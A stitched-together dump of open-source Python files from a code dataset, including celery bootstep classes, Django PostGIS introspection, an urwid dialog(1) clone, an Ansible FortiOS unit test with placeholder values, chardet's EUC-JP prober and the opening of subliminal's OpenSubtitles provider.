description=what, propagate=False,
)
if self.on_stopped:
self.on_stopped()
self.state = TERMINATE
self.shutdown_complete.set()
def join(self, timeout=None):
try:
# Will only get here if running green,
# makes sure all greenthreads have exited.
self.shutdown_complete.wait(timeout=timeout)
except IGNORE_ERRORS:
pass
def apply(self, parent, **kwargs):
"""Apply the steps in this blueprint to an object.
This will apply the ``__init__`` and ``include`` methods
of each step, with the object as argument::
step = Step(obj)
...
step.include(obj)
For :class:`StartStopStep` the services created
will also be added to the objects ``steps`` attribute.
"""
self._debug('Preparing bootsteps.')
order = self.order = []
steps = self.steps = self.claim_steps()
self._debug('Building graph...')
for S in self._finalize_steps(steps):
step = S(parent, **kwargs)
steps[step.name] = step
order.append(step)
self._debug('New boot order: {%s}',
', '.join(s.alias for s in self.order))
for step in order:
step.include(parent)
return self
def connect_with(self, other):
self.graph.adjacent.update(other.graph.adjacent)
self.graph.add_edge(type(other.order[0]), type(self.order[-1]))
def __getitem__(self, name):
return self.steps[name]
def _find_last(self):
return next((C for C in values(self.steps) if C.last), None)
def _firstpass(self, steps):
for step in values(steps):
step.requires = [symbol_by_name(dep) for dep in step.requires]
stream = deque(step.requires for step in values(steps))
while stream:
for node in stream.popleft():
node = symbol_by_name(node)
if node.name not in self.steps:
steps[node.name] = node
stream.append(node.requires)
def _finalize_steps(self, steps):
last = self._find_last()
self._firstpass(steps)
it = ((C, C.requires) for C in values(steps))
G = self.graph = DependencyGraph(
it, formatter=self.GraphFormatter(root=last),
)
if last:
for obj in G:
if obj != last:
G.add_edge(last, obj)
try:
return G.topsort()
except KeyError as exc:
raise KeyError('unknown bootstep: %s' % exc)
def claim_steps(self):
return dict(self.load_step(step) for step in self.types)
def load_step(self, step):
step = symbol_by_name(step)
return step.name, step
def _debug(self, msg, *args):
return logger.debug(_pre(self, msg), *args)
@property
def alias(self):
return _label(self)
class StepType(type):
"""Meta-class for steps."""
name = None
requires = None
def __new__(cls, name, bases, attrs):
module = attrs.get('__module__')
qname = '{0}.{1}'.format(module, name) if module else name
attrs.update(
__qualname__=qname,
name=attrs.get('name') or qname,
)
return super(StepType, cls).__new__(cls, name, bases, attrs)
def __str__(self):
return bytes_if_py2(self.name)
def __repr__(self):
return bytes_if_py2('step:{0.name}{{{0.requires!r}}}'.format(self))
@with_metaclass(StepType)
class Step(object):
"""A Bootstep.
The :meth:`__init__` method is called when the step
is bound to a parent object, and can as such be used
to initialize attributes in the parent object at
parent instantiation-time.
"""
#: Optional step name, will use ``qualname`` if not specified.
name = None
#: Optional short name used for graph outputs and in logs.
label = None
#: Set this to true if the step is enabled based on some condition.
conditional = False
    #: List of other steps that must be started before this step.
#: Note that all dependencies must be in the same blueprint.
requires = ()
#: This flag is reserved for the workers Consumer,
#: since it is required to always be started last.
#: There can only be one object marked last
#: in every blueprint.
last = False
#: This provides the default for :meth:`include_if`.
enabled = True
def __init__(self, parent, **kwargs):
pass
def include_if(self, parent):
"""Return true if bootstep should be included.
You can define this as an optional predicate that decides whether
this step should be created.
"""
return self.enabled
def instantiate(self, name, *args, **kwargs):
return instantiate(name, *args, **kwargs)
def _should_include(self, parent):
if self.include_if(parent):
return True, self.create(parent)
return False, None
def include(self, parent):
return self._should_include(parent)[0]
def create(self, parent):
"""Create the step."""
def __repr__(self):
return bytes_if_py2('<step: {0.alias}>'.format(self))
@property
def alias(self):
return self.label or _label(self)
def info(self, obj):
pass
class StartStopStep(Step):
"""Bootstep that must be started and stopped in order."""
#: Optional obj created by the :meth:`create` method.
#: This is used by :class:`StartStopStep` to keep the
#: original service object.
obj = None
def start(self, parent):
if self.obj:
return self.obj.start()
def stop(self, parent):
if self.obj:
return self.obj.stop()
def close(self, parent):
pass
def terminate(self, parent):
if self.obj:
return getattr(self.obj, 'terminate', self.obj.stop)()
def include(self, parent):
inc, ret = self._should_include(parent)
if inc:
self.obj = ret
parent.steps.append(self)
return inc
class ConsumerStep(StartStopStep):
"""Bootstep that starts a message consumer."""
requires = ('celery.worker.consumer:Connection',)
consumers = None
def get_consumers(self, channel):
raise NotImplementedError('missing get_consumers')
def start(self, c):
channel = c.connection.channel()
self.consumers = self.get_consumers(channel)
for consumer in self.consumers or []:
consumer.consume()
def stop(self, c):
self._close(c, True)
def shutdown(self, c):
self._close(c, False)
def _close(self, c, cancel_consumers=True):
channels = set()
for consumer in self.consumers or []:
if cancel_consumers:
ignore_errors(c.connection, consumer.cancel)
if consumer.channel:
channels.add(consumer.channel)
for channel in channels:
ignore_errors(c.connection, channel.close)
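# Illustrative sketch (hypothetical user code, not part of this module): a
# custom bootstep that starts after the worker pool; the 'requires' path is
# an assumption based on the celery documentation.
#
#   class ExampleStep(StartStopStep):
#       requires = {'celery.worker.components:Pool'}
#
#       def start(self, worker):
#           print('pool is up, ExampleStep starting')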
|
apache-2.0
|
davgibbs/django
|
django/contrib/gis/db/backends/postgis/introspection.py
|
330
|
5441
|
from django.contrib.gis.gdal import OGRGeomType
from django.db.backends.postgresql.introspection import DatabaseIntrospection
class GeoIntrospectionError(Exception):
pass
class PostGISIntrospection(DatabaseIntrospection):
# Reverse dictionary for PostGIS geometry types not populated until
# introspection is actually performed.
postgis_types_reverse = {}
ignored_tables = DatabaseIntrospection.ignored_tables + [
'geography_columns',
'geometry_columns',
'raster_columns',
'spatial_ref_sys',
'raster_overviews',
]
# Overridden from parent to include raster indices in retrieval.
# Raster indices have pg_index.indkey value 0 because they are an
# expression over the raster column through the ST_ConvexHull function.
# So the default query has to be adapted to include raster indices.
_get_indexes_query = """
SELECT DISTINCT attr.attname, idx.indkey, idx.indisunique, idx.indisprimary
FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
pg_catalog.pg_index idx, pg_catalog.pg_attribute attr
LEFT JOIN pg_catalog.pg_type t ON t.oid = attr.atttypid
WHERE
c.oid = idx.indrelid
AND idx.indexrelid = c2.oid
AND attr.attrelid = c.oid
AND (
attr.attnum = idx.indkey[0] OR
(t.typname LIKE 'raster' AND idx.indkey = '0')
)
AND attr.attnum > 0
AND c.relname = %s"""
def get_postgis_types(self):
"""
Returns a dictionary with keys that are the PostgreSQL object
identification integers for the PostGIS geometry and/or
geography types (if supported).
"""
field_types = [
('geometry', 'GeometryField'),
# The value for the geography type is actually a tuple
# to pass in the `geography=True` keyword to the field
# definition.
('geography', ('GeometryField', {'geography': True})),
]
postgis_types = {}
# The OID integers associated with the geometry type may
# be different across versions; hence, this is why we have
# to query the PostgreSQL pg_type table corresponding to the
# PostGIS custom data types.
oid_sql = 'SELECT "oid" FROM "pg_type" WHERE "typname" = %s'
cursor = self.connection.cursor()
try:
for field_type in field_types:
cursor.execute(oid_sql, (field_type[0],))
for result in cursor.fetchall():
postgis_types[result[0]] = field_type[1]
finally:
cursor.close()
return postgis_types
def get_field_type(self, data_type, description):
if not self.postgis_types_reverse:
# If the PostGIS types reverse dictionary is not populated, do so
# now. In order to prevent unnecessary requests upon connection
# initialization, the `data_types_reverse` dictionary is not updated
# with the PostGIS custom types until introspection is actually
# performed -- in other words, when this function is called.
self.postgis_types_reverse = self.get_postgis_types()
self.data_types_reverse.update(self.postgis_types_reverse)
return super(PostGISIntrospection, self).get_field_type(data_type, description)
def get_geometry_type(self, table_name, geo_col):
"""
The geometry type OID used by PostGIS does not indicate the particular
type of field that a geometry column is (e.g., whether it's a
PointField or a PolygonField). Thus, this routine queries the PostGIS
metadata tables to determine the geometry type,
"""
cursor = self.connection.cursor()
try:
try:
# First seeing if this geometry column is in the `geometry_columns`
cursor.execute('SELECT "coord_dimension", "srid", "type" '
'FROM "geometry_columns" '
'WHERE "f_table_name"=%s AND "f_geometry_column"=%s',
(table_name, geo_col))
row = cursor.fetchone()
if not row:
raise GeoIntrospectionError
except GeoIntrospectionError:
cursor.execute('SELECT "coord_dimension", "srid", "type" '
'FROM "geography_columns" '
'WHERE "f_table_name"=%s AND "f_geography_column"=%s',
(table_name, geo_col))
row = cursor.fetchone()
if not row:
raise Exception('Could not find a geometry or geography column for "%s"."%s"' %
(table_name, geo_col))
# OGRGeomType does not require GDAL and makes it easy to convert
# from OGC geom type name to Django field.
field_type = OGRGeomType(row[2]).django
# Getting any GeometryField keyword arguments that are not the default.
dim = row[0]
srid = row[1]
field_params = {}
if srid != 4326:
field_params['srid'] = srid
if dim != 2:
field_params['dim'] = dim
finally:
cursor.close()
return field_type, field_params
|
bsd-3-clause
|
urwid/urwid
|
examples/dialog.py
|
3
|
10254
|
#!/usr/bin/env python
#
# Urwid example similar to dialog(1) program
# Copyright (C) 2004-2009 Ian Ward
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Urwid web site: http://excess.org/urwid/
"""
Urwid example similar to dialog(1) program
"""
import sys
import urwid
class DialogExit(Exception):
pass
class DialogDisplay:
palette = [
('body','black','light gray', 'standout'),
('border','black','dark blue'),
('shadow','white','black'),
('selectable','black', 'dark cyan'),
('focus','white','dark blue','bold'),
('focustext','light gray','dark blue'),
]
def __init__(self, text, height, width, body=None):
width = int(width)
if width <= 0:
width = ('relative', 80)
height = int(height)
if height <= 0:
height = ('relative', 80)
self.body = body
if body is None:
# fill space with nothing
body = urwid.Filler(urwid.Divider(),'top')
self.frame = urwid.Frame( body, focus_part='footer')
if text is not None:
self.frame.header = urwid.Pile( [urwid.Text(text),
urwid.Divider()] )
w = self.frame
# pad area around listbox
w = urwid.Padding(w, ('fixed left',2), ('fixed right',2))
w = urwid.Filler(w, ('fixed top',1), ('fixed bottom',1))
w = urwid.AttrWrap(w, 'body')
# "shadow" effect
w = urwid.Columns( [w,('fixed', 2, urwid.AttrWrap(
urwid.Filler(urwid.Text(('border',' ')), "top")
,'shadow'))])
w = urwid.Frame( w, footer =
urwid.AttrWrap(urwid.Text(('border',' ')),'shadow'))
# outermost border area
w = urwid.Padding(w, 'center', width )
w = urwid.Filler(w, 'middle', height )
w = urwid.AttrWrap( w, 'border' )
self.view = w
def add_buttons(self, buttons):
l = []
for name, exitcode in buttons:
b = urwid.Button( name, self.button_press )
b.exitcode = exitcode
b = urwid.AttrWrap( b, 'selectable','focus' )
l.append( b )
self.buttons = urwid.GridFlow(l, 10, 3, 1, 'center')
self.frame.footer = urwid.Pile( [ urwid.Divider(),
self.buttons ], focus_item = 1)
def button_press(self, button):
raise DialogExit(button.exitcode)
def main(self):
self.loop = urwid.MainLoop(self.view, self.palette)
try:
self.loop.run()
except DialogExit as e:
return self.on_exit( e.args[0] )
def on_exit(self, exitcode):
return exitcode, ""
class InputDialogDisplay(DialogDisplay):
def __init__(self, text, height, width):
self.edit = urwid.Edit()
body = urwid.ListBox(urwid.SimpleListWalker([self.edit]))
body = urwid.AttrWrap(body, 'selectable','focustext')
DialogDisplay.__init__(self, text, height, width, body)
self.frame.set_focus('body')
def unhandled_key(self, size, k):
if k in ('up','page up'):
self.frame.set_focus('body')
if k in ('down','page down'):
self.frame.set_focus('footer')
if k == 'enter':
# pass enter to the "ok" button
self.frame.set_focus('footer')
self.view.keypress( size, k )
def on_exit(self, exitcode):
return exitcode, self.edit.get_edit_text()
class TextDialogDisplay(DialogDisplay):
def __init__(self, file, height, width):
l = []
# read the whole file (being slow, not lazy this time)
for line in open(file).readlines():
l.append( urwid.Text( line.rstrip() ))
body = urwid.ListBox(urwid.SimpleListWalker(l))
body = urwid.AttrWrap(body, 'selectable','focustext')
DialogDisplay.__init__(self, None, height, width, body)
def unhandled_key(self, size, k):
if k in ('up','page up','down','page down'):
self.frame.set_focus('body')
self.view.keypress( size, k )
self.frame.set_focus('footer')
class ListDialogDisplay(DialogDisplay):
def __init__(self, text, height, width, constr, items, has_default):
j = []
if has_default:
k, tail = 3, ()
else:
k, tail = 2, ("no",)
while items:
j.append( items[:k] + tail )
items = items[k:]
l = []
self.items = []
for tag, item, default in j:
w = constr( tag, default=="on" )
self.items.append(w)
w = urwid.Columns( [('fixed', 12, w),
urwid.Text(item)], 2 )
w = urwid.AttrWrap(w, 'selectable','focus')
l.append(w)
lb = urwid.ListBox(urwid.SimpleListWalker(l))
lb = urwid.AttrWrap( lb, "selectable" )
DialogDisplay.__init__(self, text, height, width, lb )
self.frame.set_focus('body')
def unhandled_key(self, size, k):
if k in ('up','page up'):
self.frame.set_focus('body')
if k in ('down','page down'):
self.frame.set_focus('footer')
if k == 'enter':
# pass enter to the "ok" button
self.frame.set_focus('footer')
self.buttons.set_focus(0)
self.view.keypress( size, k )
def on_exit(self, exitcode):
"""Print the tag of the item selected."""
if exitcode != 0:
return exitcode, ""
s = ""
for i in self.items:
if i.get_state():
s = i.get_label()
break
return exitcode, s
class CheckListDialogDisplay(ListDialogDisplay):
def on_exit(self, exitcode):
"""
Mimic dialog(1)'s --checklist exit.
Put each checked item in double quotes with a trailing space.
"""
if exitcode != 0:
return exitcode, ""
l = []
for i in self.items:
if i.get_state():
l.append(i.get_label())
return exitcode, "".join(['"'+tag+'" ' for tag in l])
class MenuItem(urwid.Text):
"""A custom widget for the --menu option"""
def __init__(self, label):
urwid.Text.__init__(self, label)
self.state = False
def selectable(self):
return True
def keypress(self,size,key):
if key == "enter":
self.state = True
raise DialogExit(0)
return key
def mouse_event(self,size,event,button,col,row,focus):
if event=='mouse release':
self.state = True
raise DialogExit(0)
return False
def get_state(self):
return self.state
def get_label(self):
text, attr = self.get_text()
return text
def do_checklist(text, height, width, list_height, *items):
def constr(tag, state):
return urwid.CheckBox(tag, state)
d = CheckListDialogDisplay( text, height, width, constr, items, True)
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_inputbox(text, height, width):
d = InputDialogDisplay( text, height, width )
d.add_buttons([ ("Exit", 0) ])
return d
def do_menu(text, height, width, menu_height, *items):
def constr(tag, state ):
return MenuItem(tag)
d = ListDialogDisplay(text, height, width, constr, items, False)
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_msgbox(text, height, width):
d = DialogDisplay( text, height, width )
d.add_buttons([ ("OK", 0) ])
return d
def do_radiolist(text, height, width, list_height, *items):
radiolist = []
def constr(tag, state, radiolist=radiolist):
return urwid.RadioButton(radiolist, tag, state)
d = ListDialogDisplay( text, height, width, constr, items, True )
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_textbox(file, height, width):
d = TextDialogDisplay( file, height, width )
d.add_buttons([ ("Exit", 0) ])
return d
def do_yesno(text, height, width):
d = DialogDisplay( text, height, width )
d.add_buttons([ ("Yes", 0), ("No", 1) ])
return d
MODES={ '--checklist': (do_checklist,
"text height width list-height [ tag item status ] ..."),
'--inputbox': (do_inputbox,
"text height width"),
'--menu': (do_menu,
"text height width menu-height [ tag item ] ..."),
'--msgbox': (do_msgbox,
"text height width"),
'--radiolist': (do_radiolist,
"text height width list-height [ tag item status ] ..."),
'--textbox': (do_textbox,
"file height width"),
'--yesno': (do_yesno,
"text height width"),
}
def show_usage():
"""
Display a helpful usage message.
"""
modelist = [(mode, help) for (mode, (fn, help)) in MODES.items()]
modelist.sort()
sys.stdout.write(
__doc__ +
"\n".join(["%-15s %s"%(mode,help) for (mode,help) in modelist])
+ """
height and width may be set to 0 to auto-size.
list-height and menu-height are currently ignored.
status may be either on or off.
""" )
def main():
if len(sys.argv) < 2 or sys.argv[1] not in MODES:
show_usage()
return
# Create a DialogDisplay instance
fn, help = MODES[sys.argv[1]]
d = fn( * sys.argv[2:] )
# Run it
exitcode, exitstring = d.main()
# Exit
if exitstring:
sys.stderr.write(exitstring+"\n")
sys.exit(exitcode)
if __name__=="__main__":
main()
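# Hedged usage sketch (assuming this script is saved as dialog.py and urwid
# is installed); height and width of 0 auto-size the dialog:
#
#   python dialog.py --yesno "Proceed?" 0 0
#   python dialog.py --checklist "Pick packages" 0 0 10 vim Editor on git VCS off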
|
lgpl-2.1
|
pdellaert/ansible
|
test/units/modules/network/fortios/test_fortios_user_peer.py
|
21
|
11827
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_peer
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_peer.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_peer_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
expected_data = {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn-type': 'string',
'ldap-mode': 'password',
'ldap-password': 'test_value_7',
'ldap-server': 'test_value_8',
'ldap-username': 'test_value_9',
'mandatory-ca-verify': 'enable',
'name': 'default_name_11',
'ocsp-override-server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two-factor': 'enable'
}
set_method_mock.assert_called_with('user', 'peer', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_peer_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
expected_data = {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn-type': 'string',
'ldap-mode': 'password',
'ldap-password': 'test_value_7',
'ldap-server': 'test_value_8',
'ldap-username': 'test_value_9',
'mandatory-ca-verify': 'enable',
'name': 'default_name_11',
'ocsp-override-server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two-factor': 'enable'
}
set_method_mock.assert_called_with('user', 'peer', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_peer_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'peer', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_peer_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'peer', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_peer_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_peer': {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
expected_data = {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn-type': 'string',
'ldap-mode': 'password',
'ldap-password': 'test_value_7',
'ldap-server': 'test_value_8',
'ldap-username': 'test_value_9',
'mandatory-ca-verify': 'enable',
'name': 'default_name_11',
'ocsp-override-server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two-factor': 'enable'
}
set_method_mock.assert_called_with('user', 'peer', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_peer_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_peer': {
'random_attribute_not_valid': 'tag',
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn_type': 'string',
'ldap_mode': 'password',
'ldap_password': 'test_value_7',
'ldap_server': 'test_value_8',
'ldap_username': 'test_value_9',
'mandatory_ca_verify': 'enable',
'name': 'default_name_11',
'ocsp_override_server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two_factor': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_peer.fortios_user(input_data, fos_instance)
expected_data = {
'ca': 'test_value_3',
'cn': 'test_value_4',
'cn-type': 'string',
'ldap-mode': 'password',
'ldap-password': 'test_value_7',
'ldap-server': 'test_value_8',
'ldap-username': 'test_value_9',
'mandatory-ca-verify': 'enable',
'name': 'default_name_11',
'ocsp-override-server': 'test_value_12',
'passwd': 'test_value_13',
'subject': 'test_value_14',
'two-factor': 'enable'
}
set_method_mock.assert_called_with('user', 'peer', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
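# Hedged illustration (not part of the module under test): the expected_data
# dicts above assume the FortiOS API uses hyphenated keys where the Ansible
# arguments use underscores.  A minimal key transformation consistent with
# these assertions could look like this:
def underscore_to_hyphen(data):
    """Rename snake_case keys to hyphen-case (illustrative helper only)."""
    return {k.replace('_', '-'): v for k, v in data.items()}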
|
gpl-3.0
|
jackkiej/SickRage
|
lib/chardet/eucjpprober.py
|
53
|
3666
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .enums import ProbingState, MachineState
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCJPDistributionAnalysis
from .jpcntx import EUCJPContextAnalysis
from .mbcssm import EUCJP_SM_MODEL
class EUCJPProber(MultiByteCharSetProber):
def __init__(self):
super(EUCJPProber, self).__init__()
self.coding_sm = CodingStateMachine(EUCJP_SM_MODEL)
self.distribution_analyzer = EUCJPDistributionAnalysis()
self.context_analyzer = EUCJPContextAnalysis()
self.reset()
def reset(self):
super(EUCJPProber, self).reset()
self.context_analyzer.reset()
@property
def charset_name(self):
return "EUC-JP"
def feed(self, byte_str):
for i in range(len(byte_str)):
# PY3K: byte_str is a byte array, so byte_str[i] is an int, not a byte
coding_state = self.coding_sm.next_state(byte_str[i])
if coding_state == MachineState.error:
self.logger.debug('%s prober hit error at byte %s',
self.charset_name, i)
self._state = ProbingState.not_me
break
elif coding_state == MachineState.its_me:
self._state = ProbingState.found_it
break
elif coding_state == MachineState.start:
char_len = self.coding_sm.get_current_charlen()
if i == 0:
self._last_char[1] = byte_str[0]
self.context_analyzer.feed(self._last_char, char_len)
self.distribution_analyzer.feed(self._last_char, char_len)
else:
self.context_analyzer.feed(byte_str[i - 1:i + 1],
char_len)
self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
char_len)
self._last_char[0] = byte_str[-1]
if self.state == ProbingState.detecting:
if (self.context_analyzer.got_enough_data() and
(self.get_confidence() > self.SHORTCUT_THRESHOLD)):
self._state = ProbingState.found_it
return self.state
def get_confidence(self):
context_conf = self.context_analyzer.get_confidence()
distrib_conf = self.distribution_analyzer.get_confidence()
return max(context_conf, distrib_conf)
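# Hedged usage sketch (assumes the chardet package layout imported above):
#
#   prober = EUCJPProber()
#   prober.feed(b'\xa4\xb3\xa4\xf3\xa4\xcb\xa4\xc1\xa4\xcf')  # EUC-JP bytes
#   print(prober.charset_name, prober.get_confidence())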
|
gpl-3.0
|
blissland/devflixx
|
lib/subliminal/subliminal/providers/opensubtitles.py
|
1
|
8161
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import base64
import logging
import os
import re
import zlib
import babelfish
import guessit
from . import Provider
from .. import __version__
from ..compat import ServerProxy, TimeoutTransport
from ..exceptions import ProviderError, AuthenticationError, DownloadLimitExceeded
from ..subtitle import Subtitle, fix_line_endings, compute_guess_matches
from ..video import Episode, Movie
logger = logging.getLogger(__name__)
class OpenSubtitlesSubtitle(Subtitle):
provider_name = 'opensubtitles'
series_re = re.compile('^"(?P<series_name>.*)" (?P<series_title>.*)$')
def __init__(self, language, hearing_impaired, id, matched_by, movie_kind, hash, movie_name, movie_release_name, # @ReservedAssignment
movie_year, movie_imdb_id, series_season, series_episode, page_link):
super(OpenSubtitlesSubtitle, self).__init__(language, hearing_impaired, page_link)
self.id = id
self.matched_by = matched_by
self.movie_kind = movie_kind
self.hash = hash
self.movie_name = movie_name
self.movie_release_name = movie_release_name
self.movie_year = movie_year
self.movie_imdb_id = movie_imdb_id
self.series_season = series_season
self.series_episode = series_episode
@property
def series_name(self):
return self.series_re.match(self.movie_name).group('series_name')
@property
def series_title(self):
return self.series_re.match(self.movie_name).group('series_title')
def compute_matches(self, video):
matches = set()
# episode
if isinstance(video, Episode) and self.movie_kind == 'episode':
# series
if video.series and self.series_name.lower() == video.series.lower():
matches.add('series')
# season
if video.season and self.series_season == video.season:
matches.add('season')
# episode
if video.episode and self.series_episode == video.episode:
matches.add('episode')
# guess
